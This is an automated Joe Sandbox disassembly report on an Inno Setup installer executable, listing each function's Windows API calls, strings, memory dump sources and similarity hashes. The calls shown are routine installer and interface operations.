                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                                        • String ID: %H
                                                                                                                                        • API String ID: 3275473261-1959103961
                                                                                                                                        • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                                        • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                                                        • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                                        • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                                                        • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                                                        Strings
                                                                                                                                        • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                        • String ID: Deleting Uninstall data files.
                                                                                                                                        • API String ID: 1570157960-2568741658
                                                                                                                                        • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                                        • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                                                        • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                                        • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                                                        • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                                                        Strings
                                                                                                                                        • AddFontResource, xrefs: 004702B5
                                                                                                                                        • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                                                        • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                        • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                        • API String ID: 955540645-649663873
                                                                                                                                        • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                                        • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                                                        • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                                        • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                                          • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                                          • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                                        • GetVersion.KERNEL32 ref: 00462E60
                                                                                                                                        • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                                                        • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                                                        • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                        • String ID: Explorer
                                                                                                                                        • API String ID: 2594429197-512347832
                                                                                                                                        • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                                        • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                                                        • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                                        • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                                        • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4), ref: 004783CC
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                                                        • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                        • API String ID: 2704155762-2318956294
                                                                                                                                        • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                                                        • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                                                        • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                                                        • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                                        • LocalFree.KERNEL32(0074EAB0,00000000,00401B68), ref: 00401ACF
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,0074EAB0,00000000,00401B68), ref: 00401AEE
                                                                                                                                        • LocalFree.KERNEL32(0074FAB0,?,00000000,00008000,0074EAB0,00000000,00401B68), ref: 00401B2D
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                                        • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 3782394904-2249551878
                                                                                                                                        • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                        • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                        • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                        • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                                                          • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                                                        Strings
                                                                                                                                        • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                                                        • Deleting directory: %s, xrefs: 00459E5B
                                                                                                                                        • Stripped read-only attribute., xrefs: 00459E94
                                                                                                                                        • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                                                        • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                                                        • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                                                        • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorFindLast
                                                                                                                                        • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                        • API String ID: 754982922-1448842058
                                                                                                                                        • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                                                        • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                                                        • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                                                        • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                                                        APIs
                                                                                                                                        • GetCapture.USER32 ref: 00422EA4
                                                                                                                                        • GetCapture.USER32 ref: 00422EB3
                                                                                                                                        • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                                                        • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                                                        • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                                                        • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                                                        • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                                                        • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 862346643-0
                                                                                                                                        • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                                        • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                                                        • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                                        • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                                                        • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                                                        • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveLong$Message
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2785966331-0
                                                                                                                                        • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                                        • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                                                        • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                                        • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0042948A
                                                                                                                                        • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1583807278-0
                                                                                                                                        • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                                        • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                                                                        • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                                        • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                                                        • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                                                        • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                                                        • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 225703358-0
                                                                                                                                        • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                                                        • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                                                                        • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                                                        • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                                                        • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$Load
                                                                                                                                        • String ID: $ $Internal error: Item already expanding
                                                                                                                                        • API String ID: 1675784387-1948079669
                                                                                                                                        • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                                        • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                                                                        • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                                                        • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                                                                        APIs
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                                                        • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                        • API String ID: 390214022-3304407042
                                                                                                                                        • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                                        • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                                                                        • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                                                        • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                                                                        APIs
                                                                                                                                        • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                                                        • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ClassInfoLongMessageSendWindow
• String ID: COMBOBOX$Inno Setup: Language
• API String ID: 3391662889-4234151509
• Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
• Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
  • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
• Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
APIs
• GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
  • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
  • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
